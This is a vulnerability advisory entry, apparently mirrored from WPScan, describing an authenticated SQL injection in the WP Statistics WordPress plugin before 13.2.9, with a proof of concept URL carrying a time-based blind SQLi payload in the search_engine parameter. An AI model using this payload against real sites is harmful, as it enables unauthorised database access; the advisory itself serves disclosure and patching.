Lucene search

K
wpvulndbJordy VersmissenWPVDB-ID:A0E40CFD-B217-481C-8FC4-027A0A023312
HistoryDec 27, 2022 - 12:00 a.m.

WP Statistics < 13.2.9 - Authenticated SQLi

2022-12-2700:00:00
Jordy Versmissen
wpscan.com
19
wp statistics
sql injection
authenticated
remote attackers
security vulnerability

EPSS

0.001

Percentile

38.3%

The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.

PoC

Log in as a user allowed to View WP Statistic and get a nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s: http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&amp;name;=words&amp;search;_engine=aaa' AND (SELECT 5671 FROM (SELECT(SLEEP(5)))Mdgs)–%20HsBR

EPSS

0.001

Percentile

38.3%

Related for WPVDB-ID:A0E40CFD-B217-481C-8FC4-027A0A023312